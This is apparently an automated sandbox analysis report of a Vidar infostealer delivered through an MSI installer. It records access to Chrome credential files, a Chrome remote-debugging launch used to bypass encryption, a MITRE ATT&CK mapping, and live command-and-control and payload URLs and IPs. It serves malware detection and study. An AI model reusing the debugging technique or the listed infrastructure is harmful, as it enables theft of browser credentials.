Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History

Source: Participating.com	Binary or memory string: WIN_81
Source: Participating.com	Binary or memory string: WIN_XP
Source: Participating.com, 00000020.00000000.1743130489.00000000005B3000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Participating.com	Binary or memory string: WIN_XPe
Source: Participating.com	Binary or memory string: WIN_VISTA
Source: Participating.com	Binary or memory string: WIN_7
Source: Participating.com	Binary or memory string: WIN_8

Source: Yara match

File source: Process Memory Space: Participating.com PID: 1252, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Participating.com PID: 1252, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00572263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		32_2_00572263
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00571C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		32_2_00571C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	12 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	12 Scripting	1 Exploitation for Privilege Escalation	2 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	1 Replication Through Removable Media	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	2 Valid Accounts	1 Extra Window Memory Injection	2 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	21 Input Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	2 Valid Accounts	1 DLL Side-Loading	NTDS	3 File and Directory Discovery	Distributed Component Object Model	3 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 File Deletion	LSA Secrets	48 System Information Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	12 Process Injection	1 Extra Window Memory Injection	Cached Domain Credentials	241 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	222 Masquerading	DCSync	31 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	31 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	12 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
69633f.msi	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\din[1].exe	18%	ReversingLabs
C:\Users\user\AppData\Local\Temp\615578\Participating.com	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIFDC5.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIFE52.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIFEB1.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIFEE1.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIFF11.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIFFBE.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIFFEE.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\putt.exe	18%	ReversingLabs
C:\Windows\Installer\MSIC32D.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIC39B.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIC3DB.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIC534.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
http://138.124.60.133/di8	0%	Avira URL Cloud	safe
https://sedone.onlineexe	0%	Avira URL Cloud	safe
http://138.124.60.133/8	0%	Avira URL Cloud	safe
http://138.124.60.18	0%	Avira URL Cloud	safe
https://sedone.online/bQ	100%	Avira URL Cloud	malware
http://138.8	0%	Avira URL Cloud	safe
http://138.124.60.133/din.ex8	0%	Avira URL Cloud	safe
https://sedone.online/PQ	100%	Avira URL Cloud	malware
http://138.124.60.8	0%	Avira URL Cloud	safe
http://138.124.60.133/din.exemn	0%	Avira URL Cloud	safe
http://138.124.60.138	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
t.me	149.154.167.99	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
www.google.com	172.217.19.228	true	false	high
sedone.online	116.203.12.114	true	false	high
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.58.98	true	false	high
IuwKjpytGYqQ.IuwKjpytGYqQ	unknown	unknown	false	unknown
ntp.msn.com	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Participating.com, 00000020.00000002.2527148969.00000000044B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2472515709.00006F70001C4000.00000004.00000800.00020000.00000000.sdmp, B1NOPH.32.dr	false		high
https://mail.google.com/mail/?usp=installed_webapp	chrome.exe, 00000025.00000002.2476091798.00006F7000741000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	chrome.exe, 00000025.00000002.2476745898.00006F700080C000.00000004.00000800.00020000.00000000.sdmp, B1NOPH.32.dr	false		high
https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing	chrome.exe, 00000025.00000002.2471695203.00006F7000078000.00000004.00000800.00020000.00000000.sdmp	false		high
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b	chrome.exe, 00000025.00000002.2476421076.00006F7000784000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/J	chrome.exe, 00000025.00000002.2476091798.00006F7000741000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone	chrome.exe, 00000025.00000002.2498894843.00006F7001064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2476921472.00006F7000878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2475996188.00006F7000708000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2474732485.00006F7000469000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4633	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7382	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Zj	chrome.exe, 00000025.00000003.2427773302.00006F700161C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/284462263	chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2496522249.00006F7000C40000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Zk	chrome.exe, 00000025.00000003.2427920169.00006F700162C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2427885104.00006F7001628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2427807715.00006F7001624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2427773302.00006F700161C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly	chrome.exe, 00000025.00000002.2476745898.00006F700080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2476784297.00006F700081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2474807519.00006F70004D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2497014735.00006F7000C7C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/async/newtab_promospo	chrome.exe, 00000025.00000002.2499285263.00006F70010C0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.gcp.privacysandboxservices.com	chrome.exe, 00000025.00000003.2423445169.00006F700140C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000025.00000003.2391397020.00006F7000EE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2393470957.00006F7000CC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2394399837.00006F700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2391539654.00006F7001028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2477701472.00006F70009C3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2391373199.00006F700105C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2393841871.00006F700047C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2394172187.00006F70010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2391165481.00006F7000EC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2391346510.00006F700100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2393634600.00006F7000F44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2440795826.00006F7000D88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2393513164.00006F7000734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2393596067.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/:	chrome.exe, 00000025.00000002.2476091798.00006F7000741000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.aws.privacysandboxservices.com	chrome.exe, 00000025.00000002.2498116516.00006F7000E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2423445169.00006F700140C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.google.com/settings?referrer=CHROME_NTP	chrome.exe, 00000025.00000003.2390654968.00006F7000FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2477854222.00006F70009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7714	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
http://138.124.60.133/din.ex8	powershell.exe, 00000011.00000002.1651044303.0000022DB26AF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://unisolated.invalid/	chrome.exe, 00000025.00000002.2477886275.00006F70009F0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 00000025.00000003.2394399837.00006F700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2393841871.00006F700047C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2394172187.00006F70010C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://138.124.60.133/di8	powershell.exe, 00000011.00000002.1651044303.0000022DB26AF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/tips/	chrome.exe, 00000025.00000002.2477886275.00006F70009F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2476830165.00006F700083C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2472515709.00006F70001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2477586274.00006F7000974000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000011.00000002.1681817977.0000022DC1781000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/?lfhs=2	chrome.exe, 00000025.00000002.2476091798.00006F7000741000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6248	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000025.00000003.2432001221.00006F7001C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2432991019.00006F7001D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2431304364.00006F7001CF0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6929	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.icoC:	chrome.exe, 00000025.00000002.2476421076.00006F7000784000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5281	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000011.00000002.1651044303.0000022DB1711000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/?feature=ytca	chrome.exe, 00000025.00000002.2476091798.00006F7000741000.00000004.00000800.00020000.00000000.sdmp	false		high
http://138.124.60.133/8	powershell.exe, 00000011.00000002.1651044303.0000022DB26AF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sedone.onlineexe	Participating.com, 00000020.00000002.2529145325.0000000004C9C000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://issuetracker.google.com/255411748	chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2496522249.00006F7000C40000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/u/0/create?usp=chrome_actions	chrome.exe, 00000025.00000002.2476745898.00006F700080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2476784297.00006F700081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2474807519.00006F70004D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2497014735.00006F7000C7C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7246	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7369	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000011.00000002.1651044303.0000022DB1937000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7489	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/?q=	chrome.exe, 00000025.00000002.2496522249.00006F7000C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2477169083.00006F70008D4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000011.00000002.1651044303.0000022DB1937000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	chrome.exe, 00000025.00000003.2394350022.00006F700033C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/PATENTS.txt	chrome.exe, 00000025.00000003.2391397020.00006F7000EE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2393470957.00006F7000CC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2394399837.00006F700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2391539654.00006F7001028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2477701472.00006F70009C3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2391373199.00006F700105C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2393841871.00006F700047C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2394172187.00006F70010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2391165481.00006F7000EC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2391346510.00006F700100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2393634600.00006F7000F44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2440795826.00006F7000D88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2393513164.00006F7000734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2393596067.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000011.00000002.1681817977.0000022DC1781000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en/about/products?tab	chrome.exe, 00000025.00000002.2475868326.00006F70006E4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.ico	chrome.exe, 00000025.00000002.2490806644.00006F7000C0C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Participating.com, 00000020.00000002.2527148969.00000000044B8000.00000004.00000800.00020000.00000000.sdmp, B1NOPH.32.dr	false		high
http://crl.ver)	svchost.exe, 00000026.00000002.2528454322.000001A3B8A00000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	Participating.com, 00000020.00000002.2521845428.00000000005C5000.00000002.00000001.01000000.0000000E.sdmp, Pizza.22.dr	false		high
https://chrome.google.com/webstore?hl=en3	chrome.exe, 00000025.00000002.2478269909.00006F7000AC4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/161903006	chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2496522249.00006F7000C40000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Participating.com, 00000020.00000002.2527148969.00000000044B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, B1NOPH.32.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000011.00000002.1651044303.0000022DB1937000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sedone.online/PQ	Participating.com, 00000020.00000002.2526328458.000000000433C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://t.me/detct0rd0wntgMozilla/5.0	Participating.com, 00000020.00000003.2174800196.00000000011F2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://138.124.60.133/din.exemn	powershell.exe, 00000011.00000002.1696225335.0000022DC9ED5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.ico	chrome.exe, 00000025.00000002.2472515709.00006F70001C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 00000025.00000002.2497484927.00006F7000D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2476421076.00006F7000784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2474879806.00006F7000508000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 00000025.00000002.2498894843.00006F7001064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2476921472.00006F7000878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2474732485.00006F7000469000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/kk	chrome.exe, 00000025.00000003.2427920169.00006F700162C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2427885104.00006F7001628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2427807715.00006F7001624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2427773302.00006F700161C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3078	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7553	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5375	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/tips/gsop	chrome.exe, 00000025.00000002.2477886275.00006F70009F0000.00000004.00000800.00020000.00000000.sdmp	false		high
